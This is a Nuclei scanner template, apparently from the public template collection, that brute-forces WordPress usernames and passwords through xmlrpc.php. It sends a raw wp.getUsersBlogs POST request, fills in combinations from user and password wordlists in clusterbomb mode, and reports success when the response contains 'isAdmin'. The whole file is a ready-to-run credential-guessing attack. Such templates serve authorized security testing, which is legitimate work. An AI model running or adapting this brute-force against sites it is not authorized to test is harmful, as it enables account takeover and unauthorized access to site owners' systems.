nuclei-templates/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml

55 lines
1.5 KiB
YAML

id: wordpress-xmlrpc-brute-force
info:
name: Wordpress XMLRPC.php username and password Bruteforcer
author: Exid
severity: high
description: This template bruteforces username and passwords through xmlrpc.php being available.
reference:
- https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
metadata:
max-request: 276
tags: wordpress,php,xmlrpc,fuzz
http:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 235
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value>{{username}}</value>
</param>
<param>
<value>{{password}}</value>
</param>
</params>
</methodCall>
attack: clusterbomb
payloads:
username: helpers/wordlists/wp-users.txt
password: helpers/wordlists/wp-passwords.txt
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'url'
- 'xmlrpc'
- 'isAdmin'
condition: and
# digest: 4a0a00473045022015e974a66401ab19122f964baf651b3837022edf0e6bba2008ac218028986d41022100fd63559f39d1e5e4ca8484751b6c283a87a8b153fdd17e89d9c8caa3761471f5:922c64590222798bb761d5b6d8e72950